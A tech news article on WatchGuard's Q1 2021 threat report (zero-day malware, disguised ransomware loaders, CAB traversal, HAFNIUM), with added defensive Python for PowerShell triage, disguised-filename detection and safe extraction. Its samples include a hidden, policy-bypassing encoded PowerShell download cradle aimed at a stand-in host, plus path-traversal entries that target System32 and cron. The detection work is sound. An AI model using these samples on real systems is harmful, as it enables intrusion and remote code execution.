How traditional malware systems are coming up short

New WatchGuard research finds that 74% of the threats it detected last quarter were zero-day malware, which signature-based anti-malware could not catch at the time of release.

WatchGuard® Technologies’ latest Internet Security Report shows that 74% of threats detected last quarter were zero-day malware: samples for which no antivirus signature existed at the time of release, so conventional signature-based antivirus would not have caught them. The report also found that network attacks surged, with a 21% increase over the previous quarter and the highest volume since early 2018. With WatchGuard appliances detecting more than 4 million network attacks, on-premises corporate servers and assets remain high-value targets for attackers despite the shift to remote and hybrid work.

“Last quarter saw the highest level of zero-day malware detections we’ve ever recorded. Evasive malware rates have eclipsed those of traditional threats, which is yet another sign that organisations need to evolve their defences to stay ahead of increasingly sophisticated threat actors,” said Corey Nachreiner, chief security officer at WatchGuard. “Traditional anti-malware solutions alone are insufficient for today’s threat environment. Every organisation needs a layered, proactive security strategy that involves machine learning and behavioural analysis to detect and block new and advanced threats.” 

Other key findings from WatchGuard’s Q1 2021 Internet Security Report cover how attackers are disguising and repurposing old exploits, along with the quarter’s top malware attacks.

· Fileless malware variant explodes in popularity 

XML.JSLoader is a malicious payload that appeared for the first time in both WatchGuard’s top-malware-by-volume and most-widespread-malware lists, and it was also the variant WatchGuard detected most often via HTTPS inspection in Q1. The sample identified uses an XML external entity (XXE) attack to open a shell, then runs PowerShell commands that override the local execution policy and execute non-interactively, hidden from the user. (PowerShell’s execution policy is a safety setting rather than a security boundary; it can be overridden from the command line, so an override is a detection signal, not a barrier.) This is another example of the rising prevalence of fileless malware and of the need for advanced endpoint detection and response capabilities.
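As an added illustration (example code written for this page, not WatchGuard’s or this article’s own), the following Python scores PowerShell command lines taken from process-creation telemetry for the traits described above: an execution-policy override, non-interactive or hidden execution, and an encoded command, which it decodes so that download-and-execute idioms become visible. The sample events, PIDs and the example.invalid URL are constructed for the example; the alias table reflects powershell.exe’s documented short parameter forms, and the code also accepts the unambiguous prefixes powershell.exe itself accepts (such as `-Exec` or `-Enc`), which goes beyond the single sample the text describes.

```python
import base64
import re

# Short forms powershell.exe documents in its own help ("-ExecutionPolicy | -ex | -ep",
# "-EncodedCommand | -e | -ec", "-NonInteractive | -noni", "-NoProfile | -nop",
# "-WindowStyle | -w"). powershell.exe also accepts any unambiguous prefix.
PARAM_ALIASES = {
    "executionpolicy": {"ex", "ep"},
    "encodedcommand": {"e", "ec"},
    "noninteractive": {"noni"},
    "noprofile": {"nop"},
    "windowstyle": {"w"},
}

# Download-and-execute idioms worth surfacing once the command line is readable.
SUSPICIOUS_CONTENT = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|net\.webclient"
    r"|invoke-webrequest|\biwr\b|frombase64string",
    re.IGNORECASE,
)


def canonical_param(token: str):
    """Map '-NonI', '/ep', '-Exec', ... to the full parameter name, or None."""
    if not token or token[0] not in "-/":
        return None
    t = token.lstrip("-/").lower()
    if not t:
        return None
    exact = [n for n, aliases in PARAM_ALIASES.items() if t == n or t in aliases]
    if len(exact) == 1:
        return exact[0]
    prefixed = [n for n in PARAM_ALIASES if n.startswith(t)]
    return prefixed[0] if len(prefixed) == 1 else None  # ambiguous prefix -> None


def decode_encoded_command(blob: str):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline: str) -> dict:
    """Return the evasion flags present on one PowerShell command line."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    findings, decoded = [], None
    i = 1  # tokens[0] is the executable itself
    while i < len(tokens):
        name = canonical_param(tokens[i])
        raw_value = tokens[i + 1] if i + 1 < len(tokens) else ""
        value = raw_value.lower()
        if name == "executionpolicy":
            if value in ("bypass", "unrestricted"):
                findings.append("execution_policy_override")
            i += 2
        elif name == "windowstyle":
            if value == "hidden":
                findings.append("hidden_window")
            i += 2
        elif name == "encodedcommand":
            findings.append("encoded_command")
            decoded = decode_encoded_command(raw_value)
            i += 2
        elif name in ("noninteractive", "noprofile"):
            findings.append("non_interactive" if name == "noninteractive" else "no_profile")
            i += 1
        else:
            i += 1
    visible = cmdline + (" " + decoded if decoded else "")
    if SUSPICIOUS_CONTENT.search(visible):
        findings.append("suspicious_content")
    return {"findings": findings, "decoded_command": decoded}


def is_powershell(image: str) -> bool:
    leaf = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return leaf in ("powershell.exe", "pwsh.exe", "powershell_ise.exe")


def triage(events):
    """Keep only PowerShell process-creation events that carry evasion flags."""
    hits = []
    for ev in events:
        if not is_powershell(ev["image"]):
            continue
        result = analyze_cmdline(ev["cmdline"])
        if result["findings"]:
            hits.append((ev["pid"], result["findings"]))
    return hits


# Constructed sample events (hypothetical PIDs, inert example.invalid URL); they stand
# in for process-creation telemetry such as Sysmon Event ID 1.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {_ENCODED}"},
    {"pid": 4188, "parent": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
    {"pid": 4201, "parent": "cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for pid, flags in triage(SAMPLE_EVENTS):
        print(pid, flags)
```

The point of decoding `-EncodedCommand` before matching is that the interesting strings (`IEX`, `DownloadString`) never appear in the raw command line; a rule that only inspects the visible text misses exactly the non-interactive, hidden invocations the report describes.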

· Simple file name trick helps hackers pass off a ransomware loader as a legitimate PDF attachment 

The ransomware loader Zmutzy surfaced as one of the top two encrypted malware variants by volume in Q1. Associated specifically with Nibiru ransomware, it reaches victims as a zipped email attachment or as a download from a malicious website. Running the contents of the zip downloads an executable that appears to the victim to be a legitimate PDF: the attackers used a comma instead of a period in the file name and a manually adjusted icon to pass the malicious file off as a PDF. (Windows Explorer hides known file extensions by default, so a name such as “invoice,pdf.exe” is displayed as “invoice,pdf”, and with a PDF icon applied the executable is hard to distinguish from a document.) This type of attack highlights the importance of phishing education and training, and of maintaining backups in case a variant like this unleashes a ransomware infection.
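As an added illustration (example code written for this page, not WatchGuard’s or this article’s own), the following Python shows the mail-gateway side of the trick above: it reconstructs what Explorer would display for a given file name with extension hiding on, flags names whose real extension is executable while the stem is dressed up as a document, and scans a zip attachment’s member names without extracting anything. It generalises beyond the comma trick to the period double extension and the Unicode right-to-left override, which the text does not mention. The sample archive and its file names are constructed for the example and contain inert bytes; the extension lists are an assumption a deployment would tune.

```python
import io
import re
import zipfile

# Extensions Windows will execute on double-click, and document types a lure imitates.
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs",
                  "vbe", "wsf", "wsh", "hta", "ps1", "msi", "lnk", "cpl"}
DOCUMENT_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf",
                "jpg", "jpeg", "png"}
RTLO = "\u202e"  # right-to-left override: reorders the displayed name


def split_ext(name: str):
    stem, dot, ext = name.rpartition(".")
    return (name, "") if not dot else (stem, ext.lower())


def explorer_display_name(name: str) -> str:
    """Approximate Explorer with 'Hide extensions for known file types' on (the
    default): the final extension of a registered type is not shown."""
    stem, ext = split_ext(name)
    return stem if ext in EXECUTABLE_EXT | DOCUMENT_EXT else name


def classify_filename(name: str) -> list:
    """Reasons a file name looks like an executable disguised as a document."""
    reasons = []
    if RTLO in name:
        reasons.append("rtlo_override")
        name = name.replace(RTLO, "")
    stem, ext = split_ext(name)
    if ext in EXECUTABLE_EXT:
        reasons.append(f"executable_extension:{ext}")
        # A document extension glued onto the stem with a period, comma or similar
        # separator ("Invoice.pdf.exe", "Invoice,pdf.exe") is the disguise.
        m = re.search(r"[.,;_\- ]([A-Za-z0-9]{2,5})$", stem)
        if m and m.group(1).lower() in DOCUMENT_EXT:
            reasons.append(f"disguised_as:{m.group(1).lower()}")
    return reasons


def scan_zip(data: bytes) -> dict:
    """Classify every file inside a zip attachment without extracting it."""
    verdicts = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            leaf = info.filename.replace("\\", "/").rsplit("/", 1)[-1]
            verdicts[info.filename] = classify_filename(leaf)
    return verdicts


def build_sample_zip() -> bytes:
    """Constructed stand-in for the attachment: lure-style names, inert bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice_2021-03,pdf.exe", b"MZ placeholder, not a program")
        zf.writestr("readme.txt", b"nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(f"{member!r} shown as {explorer_display_name(member)!r}: {reasons or 'ok'}")
```

Inspecting member names inside the archive matters because the outer attachment is just a .zip; the deceptive name only becomes visible once the gateway looks at the central directory.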

· Threat actors continue to attack IoT devices 

While it didn’t make WatchGuard’s top 10 malware list for Q1, the Linux.Ngioweb.B variant has recently been used by adversaries to target IoT devices. The first version of this sample targeted Linux servers running WordPress, arriving initially as an Executable and Linkable Format (ELF) binary. Another version of the malware turns infected IoT devices into a botnet with rotating command-and-control servers.

· An old directory traversal attack technique makes a comeback 

WatchGuard detected a new threat signature in Q1 involving a directory traversal attack via cabinet (CAB) files, a Microsoft-designed archive format that supports lossless compression and embedded digital signatures. A new addition to WatchGuard’s top 10 network attacks list, the exploit relies either on tricking users into opening a malicious CAB file by conventional means, or on spoofing a network-connected printer so that the victim installs a printer driver from an attacker-supplied CAB file. The traversal itself comes from archive entries whose paths (for example, those containing “..” components) escape the intended extraction directory, so files land where the extractor never meant to write. 
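As an added illustration (example code written for this page, not WatchGuard’s or this article’s own), the following Python shows the check an extractor needs for any archive format whose entries carry author-chosen paths, CAB included: entry names are rejected if they are absolute, carry a drive or UNC prefix, or contain a “..” component, and a second, independent check confirms the final resolved path stays under the extraction root. It does not parse the CAB container itself; the entries below are a constructed file list standing in for a printer-driver cabinet, with hypothetical names and inert contents.

```python
import ntpath
import os
import tempfile


def is_safe_member_name(name: str) -> bool:
    """Reject archive entry names that could land outside the extraction root.

    CAB entries, like zip and tar entries, carry a relative path chosen by the
    archive's author, so the extractor, not the format, has to enforce bounds.
    """
    if not name or "\x00" in name:
        return False
    if ntpath.splitdrive(name)[0]:          # "C:\..." or "\\server\share\..."
        return False
    normalized = name.replace("\\", "/")
    if normalized.startswith("/"):          # absolute path
        return False
    parts = [p for p in normalized.split("/") if p not in ("", ".")]
    # Any ".." component is rejected outright: a benign archive has no reason to
    # reference its parent directory, and "a/../../b" still escapes.
    return bool(parts) and ".." not in parts


def resolve_member(dest_root: str, name: str) -> str:
    """Independent second check: the resolved absolute path must stay under dest_root."""
    root = os.path.realpath(dest_root)
    target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"entry escapes extraction root: {name!r}")
    return target


def extract_entries(entries, dest_root: str) -> dict:
    """Write (name, bytes) entries under dest_root, skipping unsafe names."""
    written, rejected = [], []
    for name, payload in entries:
        if not is_safe_member_name(name):
            rejected.append(name)
            continue
        try:
            target = resolve_member(dest_root, name)
        except ValueError:
            rejected.append(name)
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as fh:
            fh.write(payload)
        written.append(name)
    return {"written": written, "rejected": rejected}


# Constructed stand-in for a printer-driver CAB's file list: two plausible driver
# files plus traversal entries of the kind a malicious archive would carry.
SAMPLE_ENTRIES = [
    ("drivers/printer.inf", b"[Version]\nSignature=\"$Windows NT$\"\n"),
    ("drivers/printer.cat", b"placeholder catalog bytes"),
    ("../../Windows/System32/spool/drivers/evil.dll", b"MZ placeholder"),
    (r"..\..\Windows\System32\evil.dll", b"MZ placeholder"),
    (r"C:\Windows\System32\evil.dll", b"MZ placeholder"),
    ("/etc/cron.d/evil", b"* * * * * root /tmp/x\n"),
]


def extract_sample() -> dict:
    """Run the extractor over SAMPLE_ENTRIES in a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return extract_entries(SAMPLE_ENTRIES, tmp)


if __name__ == "__main__":
    print(extract_sample())
```

Both checks are kept because they fail differently: the name filter catches Windows-style separators and drive prefixes that a POSIX `realpath` would treat as ordinary characters, while the resolved-path check catches anything the filter did not anticipate, such as a symlinked directory already present under the root.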

· HAFNIUM zero-days provide lessons on threat tactics and response best practices 

Last quarter, Microsoft reported that adversaries were using the four HAFNIUM vulnerabilities in various Exchange Server versions to gain unauthenticated remote code execution with SYSTEM privileges and arbitrary file-write access on any unpatched server exposed to the Internet, as most on-premises email servers are. WatchGuard’s incident analysis dives into the vulnerabilities and highlights the importance of HTTPS inspection, timely patching and replacing legacy systems. 

· Attackers co-opt legitimate domains in crypto mining campaigns

In Q1, WatchGuard’s DNSWatch service blocked several compromised and outright malicious domains associated with crypto mining threats. Cryptominer malware has become increasingly popular due to recent price spikes in the cryptocurrency market and the ease with which threat actors can siphon resources from unsuspecting victims.

WatchGuard’s quarterly research reports are based on anonymised Firebox Feed data from active WatchGuard Fireboxes whose owners have opted in to share data to support the Threat Lab’s research efforts. In Q1, WatchGuard blocked a total of more than 17.2 million malware variants (461 per device) and nearly 4.2 million network threats (113 per device). The full report includes details on additional malware and network trends from Q1 2021, a detailed analysis of the HAFNIUM Microsoft Exchange Server exploits, critical defence tips for readers, and more. 

Read WatchGuard’s complete Q1 2021 Internet Security Report here

About WatchGuard Technologies

WatchGuard® Technologies is a global leader in network security, secure Wi-Fi, multi-factor authentication, advanced endpoint protection, and network intelligence. The company’s award-winning products and services are trusted worldwide by nearly 18,000 security resellers and service providers to protect more than 250,000 customers. WatchGuard’s mission is to make enterprise-grade security accessible to companies of all types and sizes through simplicity, making WatchGuard an ideal solution for midmarket businesses and distributed enterprises. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.

Amber Donovan-Stevens

Amber is a Content Editor at Top Business Tech
